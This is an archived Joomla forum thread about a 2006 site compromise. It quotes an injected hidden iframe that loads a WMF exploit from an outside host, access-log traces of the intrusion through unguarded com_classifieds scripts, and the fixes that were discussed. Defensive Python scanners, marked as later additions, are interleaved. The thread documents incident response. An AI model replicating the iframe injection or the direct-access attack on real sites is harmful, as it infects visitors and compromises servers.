The Joomla! Forum ™



 Post subject: Site Hacked
PostPosted: Thu Aug 03, 2006 9:31 am 
Joomla! Explorer

Joined: Fri Aug 26, 2005 11:05 am
Posts: 269
Location: Como - Italy
Now it's ok but my site was hacked by someone. I've noticed that the file mod_mainmenu.php was hacked and inside someone added an iframe that goes to http://zchxsikpgz.biz/dl/xpladv521.wmf, which is an Exploit.WMF.A.

My Joomla version is 1.0.10. How was that possible?

As soon as I can I'll post the modified mod_mainmenu.php. I've overwritten the hacked one with a fresh one and now everything is ok.

_________________
http://blog.shift.it
http://portale.shift.it


Post subject: Re: Site Hacked
PostPosted: Thu Aug 03, 2006 9:40 am
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17265
Location: **Translation Matters**
Please list here the 3pds extensions you are using, as well as their version number.
Please also look here for known 3pds vulnerabilities and their upgrade if available.
http://forum.joomla.org/index.php/topic,79477.0.html

Changing the mod_mainmenu.php file will not help you, as you first have to figure out how your site was hacked in order to prevent it in the future.

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Last edited by infograf768 on Thu Aug 03, 2006 9:42 am, edited 1 time in total.

Post subject: Re: Site Hacked
PostPosted: Thu Aug 03, 2006 9:48 am
Joomla! Explorer

Joined: Fri Aug 26, 2005 11:05 am
Posts: 269
Location: Como - Italy
You're right, but at least I've restored the site functionality. Here's the list of components. I've seen that I have PerForms, and maybe they've used this one to hack the site. I've deleted it.



_________________
http://blog.shift.it
http://portale.shift.it


Post subject: Re: Site Hacked
PostPosted: Thu Aug 03, 2006 9:55 am
Joomla! Explorer

Joined: Fri Aug 26, 2005 11:05 am
Posts: 269
Location: Como - Italy
Here are the lines added to my mod_mainmenu.php

Code:
// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );
echo '<iframe src="http://zchxsikpgz.biz/dl/adv521.php" width=1 height=1></iframe>';
echo '<iframe src="http://zchxsikpgz.biz/dl/adv521.php" width=1 height=1></iframe>'; if (!defined( '_MOS_MAINMENU_MODULE' )) {

_________________
http://blog.shift.it
http://portale.shift.it


Post subject: Re: Site Hacked
PostPosted: Thu Aug 03, 2006 10:05 am
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17265
Location: **Translation Matters**
Be sure to delete all related files by ftp and check the modification dates for other files.

OT: I see sef_advance is displayed twice, and that, instead of JCE, you are using the older mce.

Also, docman is a version RC1 and not RC2.

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Last edited by infograf768 on Thu Aug 03, 2006 10:07 am, edited 1 time in total.
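
A sketch of the sweep suggested in this reply, added here as an example and not posted by anyone in the thread: it walks a site tree, flags files containing a near-invisible iframe like the one quoted above, and lists files modified since a known-good time. The function names, the extension list and the sample tree (which uses the placeholder host example.invalid) are assumptions.

```python
import os, re, tempfile, time

# Near-invisible iframe (width or height of 0 or 1), the shape of the injected lines above.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?[01]\b[^>]*>", re.IGNORECASE)
WEB_EXT = (".php", ".html", ".htm", ".js", ".tpl")  # assumed set of files worth reading

def scan_tree(root, since_epoch):
    """Return (hits, recent): files containing a hidden iframe, and files
    whose mtime is at or after since_epoch (e.g. the last known-good deploy)."""
    hits, recent = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(WEB_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    text = fh.read()
                mtime = os.path.getmtime(path)
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            rel = os.path.relpath(path, root)
            if HIDDEN_IFRAME.search(text):
                hits.append(rel)
            if mtime >= since_epoch:
                recent.append(rel)
    return sorted(hits), sorted(recent)

def build_sample_site(root):
    """Constructed two-file tree: one old clean module, one freshly modified and injected."""
    os.makedirs(os.path.join(root, "modules"))
    clean = os.path.join(root, "modules", "mod_search.php")
    dirty = os.path.join(root, "modules", "mod_mainmenu.php")
    with open(clean, "w") as fh:
        fh.write("<?php\ndefined( '_VALID_MOS' ) or die( 'Restricted access' );\n")
    with open(dirty, "w") as fh:
        fh.write("<?php\necho '<iframe src=\"http://example.invalid/x.php\" width=1 height=1></iframe>';\n")
    week_ago = time.time() - 7 * 86400
    os.utime(clean, (week_ago, week_ago))  # pretend the clean file predates the incident

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        print(scan_tree(site, time.time() - 86400))
```

Modification times can be reset by whoever wrote the file, so an empty `recent` list does not prove a tree is clean; comparing the tree against a fresh copy of the release is the stronger check.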

Post subject: Re: Site Hacked
PostPosted: Sat Aug 05, 2006 11:00 am
Joomla! Apprentice

Joined: Wed Sep 07, 2005 5:49 pm
Posts: 19
@shiftsrl:

I do not know if you've resolved the issue yet or not, but today I was contacted by the administrator of a joomla site running on our server. He reported the exact same hack as you described (modified mod_mainmenu.php to include iframe to some site).

I searched the logfiles for his site and found the following lines:

Code:
82.207.99.8 - - [04/Aug/2006:11:06:51 +0200] "GET //administrator/components/com_classifieds/popups/ImageManager/images.php HTTP/1.0" 200 14196 "-" "Mozilla/4.0"
82.207.99.8 - - [04/Aug/2006:11:06:52 +0200] "GET //administrator/components/com_classifieds/popups/insert_image.php HTTP/1.0" 200 18502 "-" "Mozilla/4.0"
82.207.99.8 - - [04/Aug/2006:11:21:50 +0200] "POST /administrator/components/com_classifieds/popups/ImageManager/images.php HTTP/1.0" 200 14198 "-" "Mozilla/4.0 (compatible; Synapse)"
82.207.99.8 - - [04/Aug/2006:11:21:52 +0200] "GET /components/com_classifieds/adimages/config.php HTTP/1.0" 200 5 "-" "Mozilla/4.0"


This looked suspicious to me. A direct link to images.php? From an IP address in the Ukraine? I assume there aren't too many Ukrainians who speak Dutch (it's a Dutch website).

I found that the direct URL does indeed allow direct execution of images.php, bypassing normal joomla security. That file, as well as a few other php files in that folder are missing some of the standard joomla security checks (like "defined( '_VALID_MOS' ) or die( 'Restricted access' );" for example). I'm not a joomla expert but I assume this is the cause of the vulnerability.

I still need to do several more checks to see if this is indeed the cause of the problem, but at the moment it sure looks like it. Since you posted that you're also running com_classifieds, the same vulnerability may also be the cause of your problem.

HTH

Cheers,
Aspegic


Last edited by Aspegic on Sat Aug 05, 2006 11:07 am, edited 1 time in total.
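
The log review described in this post can be automated. The following is an added example, not code from the thread: it flags successful requests that reach a .php file inside a component directory directly, and groups them per client and component. The log lines are constructed (documentation IP ranges) and modelled on the ones quoted above; treating every direct hit as noteworthy assumes legitimate visitors enter through the site's index scripts.

```python
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
COMPONENT_PHP = re.compile(
    r'^/(?:administrator/)?components/(?P<comp>com_[^/]+)/.+\.php$', re.IGNORECASE)

def direct_component_hits(lines):
    """Successful requests that reach a component's .php file without going through index.php."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not m['status'].startswith('2'):
            continue
        # Drop the query string and collapse '//' so '//administrator/...' still matches.
        path = re.sub(r'/{2,}', '/', m['path'].split('?', 1)[0])
        c = COMPONENT_PHP.match(path)
        if c:
            hits.append({'ip': m['ip'], 'ts': m['ts'], 'method': m['method'],
                         'component': c['comp'].lower(), 'path': path})
    return hits

def summarize(hits):
    """Group hits by (client, component); 'posted' marks clients that also sent a POST."""
    out = defaultdict(lambda: {'paths': [], 'posted': False})
    for h in hits:
        entry = out[(h['ip'], h['component'])]
        entry['paths'].append(h['path'])
        entry['posted'] |= h['method'] == 'POST'
    return dict(out)

# Constructed log lines, modelled on the excerpt in the post above.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Aug/2006:11:06:51 +0200] "GET //administrator/components/com_classifieds/popups/ImageManager/images.php HTTP/1.0" 200 14196 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [04/Aug/2006:11:21:50 +0200] "POST /administrator/components/com_classifieds/popups/ImageManager/images.php HTTP/1.0" 200 14198 "-" "Mozilla/4.0 (compatible; Synapse)"',
    '192.0.2.10 - - [04/Aug/2006:11:21:52 +0200] "GET /components/com_classifieds/adimages/config.php HTTP/1.0" 200 5 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [04/Aug/2006:11:30:02 +0200] "GET /index.php?option=com_classifieds&Itemid=5 HTTP/1.1" 200 20311 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for key, info in summarize(direct_component_hits(SAMPLE_LOG)).items():
        print(key, 'POST seen' if info['posted'] else 'GET only', info['paths'])
```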

Post subject: Re: Site Hacked
PostPosted: Sat Aug 05, 2006 2:03 pm
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17265
Location: **Translation Matters**
February discovered vulnerability.
See here:
http://forum.joomla.org/index.php/topic,40492.0.html

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Post subject: Re: Site Hacked
PostPosted: Sat Aug 05, 2006 2:36 pm
Joomla! Apprentice

Joined: Wed Sep 07, 2005 5:49 pm
Posts: 19
infograf768 wrote:
February discovered vulnerability.
See here:
http://forum.joomla.org/index.php/topic,40492.0.html


I do believe that thread discusses a different classifieds component called "Noah". The one installed on the website on our server used the classifieds component available at mambo.posluh.hr

The snapshot posted earlier by shiftsrl - showing the 3rd party components he has installed on his site - shows he uses the same version as was installed on my client's site: "Classifieds v1.3 M451".

I visited mambo.posluh.hr and it appears Classifieds version 1.3 M451 is currently the latest release available from that website (released January 2005). The download from their website still contains the php scripts without the necessary security checks.

Cheers,
Aspegic


Last edited by Aspegic on Sat Aug 05, 2006 2:49 pm, edited 1 time in total.

Post subject: Re: Site Hacked
PostPosted: Sat Aug 05, 2006 3:03 pm
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17265
Location: **Translation Matters**
Then yours has been updated by the developer here:
http://support.gorsk.net/content/view/87/2/

The security patch is clearly shown.

Hope it helps

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Post subject: Re: Site Hacked
PostPosted: Sat Aug 05, 2006 3:29 pm
Joomla! Apprentice

Joined: Wed Sep 07, 2005 5:49 pm
Posts: 19
infograf768 wrote:
Then yours has been updated by the developer here:
http://support.gorsk.net/content/view/87/2/


Although my Russian is a bit rusty, there is enough English there to suggest that is indeed the same component. Just a bit strange that the security update is not available from posluh.hr...
Thanks for the link. I'll pass it along to my client.

Cheers,
Aspegic


Post subject: Re: Site Hacked
PostPosted: Sat Aug 05, 2006 3:43 pm
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17265
Location: **Translation Matters**
Aspegic wrote:

Although my Russian is a bit rusty, there is enough English there to suggest that is indeed the same component. Just a bit strange that the security update is not available from posluh.hr...



That old mambo site has not been updated since April 2005.
It is dead I guess.

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Post subject: Re: Site Hacked
PostPosted: Sat Aug 05, 2006 5:09 pm
Joomla! Intern

Joined: Mon Aug 22, 2005 6:47 pm
Posts: 64
Maybe RobS takes this component to his list too ;D


Post subject: Re: Site Hacked
PostPosted: Wed Aug 09, 2006 10:22 pm
Joomla! Apprentice

Joined: Wed Aug 09, 2006 10:16 pm
Posts: 18
infograf768 wrote:
Aspegic wrote:

Although my Russian is a bit rusty, there is enough English there to suggest that is indeed the same component. Just a bit strange that the security update is not available from posluh.hr...



That old mambo site has not been updated since April 2005.
It is dead I guess.


Hi, I have just been made aware of this hack to one of my sites. I use the Classifieds component, so I downloaded the patch from the link above. However, if you look at the two files in the patch, the fix is negated by the line:

define( "_VALID_MOS", 1 );

Very strange. You need to comment this out, I believe


Post subject: Re: Site Hacked
PostPosted: Thu Aug 10, 2006 5:18 am
Joomla! Enthusiast

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 182
not only comment that out...  but add the following lines at the start of the file, just after the source commentary:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');


Post subject: Re: Site Hacked
PostPosted: Thu Aug 10, 2006 6:52 am
Joomla! Apprentice

Joined: Wed Aug 09, 2006 10:16 pm
Posts: 18
I think, this line:

require( "../../../../includes/auth.php" );  // Thx 2 Lismo

adds the important

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

However I see there are other files that don't have any protection. I am going to remove this component.
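
An added example (not from the thread or from the component's patch) that checks PHP sources for the guard discussed in the last three posts. It separates files that test `_VALID_MOS`, files that define the constant themselves before testing it, and files with no check of their own; the verdict labels, function names and sample sources are assumptions, and the comment stripping is a heuristic.

```python
import os, re, tempfile

GUARD = re.compile(r"defined\s*\(\s*['\"]_VALID_MOS['\"]\s*\)\s*(?:or|\|\|)\s*(?:die|exit)\b", re.I)
SELF_DEFINE = re.compile(r"(?<![a-z_])define\s*\(\s*['\"]_VALID_MOS['\"]", re.I)
INCLUDE = re.compile(r"\b(?:require|include)(?:_once)?\b", re.I)
# Heuristic comment stripper: it also eats '//' or '#' inside string literals.
COMMENTS = re.compile(r"/\*.*?\*/|//[^\n]*|#[^\n]*", re.S)

def classify(php_source):
    """Return 'guarded', 'negated', 'review-include' or 'unguarded' for one file."""
    code = COMMENTS.sub("", php_source)
    guard, selfdef = GUARD.search(code), SELF_DEFINE.search(code)
    # A file that defines _VALID_MOS itself before testing it always passes its own check.
    if selfdef and (guard is None or selfdef.start() < guard.start()):
        return "negated"
    if guard:
        return "guarded"
    # The check may live in an included file; that file has to be read by hand.
    return "review-include" if INCLUDE.search(code) else "unguarded"

def audit_tree(root):
    """Map relative path -> verdict for every .php file under root that is not 'guarded'."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, "r", errors="replace") as fh:
                    verdict = classify(fh.read())
                if verdict != "guarded":
                    findings[os.path.relpath(path, root)] = verdict
    return findings

# Constructed sources modelled on the lines quoted in the thread.
SAMPLES = {
    "ok.php": "<?php\ndefined( '_VALID_MOS' ) or die( 'Restricted access' );\necho 1;\n",
    "patched_badly.php": "<?php\ndefine( \"_VALID_MOS\", 1 );\ndefined( '_VALID_MOS' ) or die( 'x' );\n",
    "commented_out.php": "<?php\n// define( \"_VALID_MOS\", 1 );\ndefined( '_VALID_MOS' ) or die( 'x' );\n",
    "via_auth.php": "<?php\nrequire( \"../../../../includes/auth.php\" );  // Thx 2 Lismo\necho 1;\n",
    "bare.php": "<?php\necho 'images';\n",
}

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        for name, src in SAMPLES.items():
            with open(os.path.join(root, name), "w") as fh:
                fh.write(src)
        for path, verdict in sorted(audit_tree(root).items()):
            print(f"{verdict:15} {path}")
```

The site's own entry scripts set the constant by design, so point this at extension directories rather than the site root.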


Post subject: Re: Site Hacked
PostPosted: Sat Aug 12, 2006 4:28 pm
Joomla! Explorer

Joined: Fri Aug 26, 2005 11:05 am
Posts: 269
Location: Como - Italy
Thanks for the info. In my case I think that the problem was the component PerForms, which I've deleted. In any case I've also patched the classified, but a question still remains. Is this component secure with the patch or not?

_________________
http://blog.shift.it
http://portale.shift.it


Post subject: Re: Site Hacked
PostPosted: Sun Sep 10, 2006 11:58 pm
Joomla! Fledgling

Joined: Wed Sep 14, 2005 12:15 pm
Posts: 3
Hi,
I have the same problem with this component. I have also been hacked by an inserted iframe.

I use this component a lot. Does anyone have any suggestion on this?

Is anybody out there who could check the security of this component and possibly fix the security issues?


Post subject: Re: Site Hacked
PostPosted: Tue Aug 21, 2007 3:23 am
Joomla! Explorer

Joined: Mon May 15, 2006 2:21 am
Posts: 491
Location: The magical land of Iowa
Has anyone ever developed com_classified further? Any security issues still on this?

_________________
On the web since 1995. 495 posts in the old Mambo forum. Under the hood with Wordpress, Joomla, and Drupal since 2006. Many more platforms before and since.

http://www.newlocalmedia.com
http://www.twitter.com/newlocalmedia

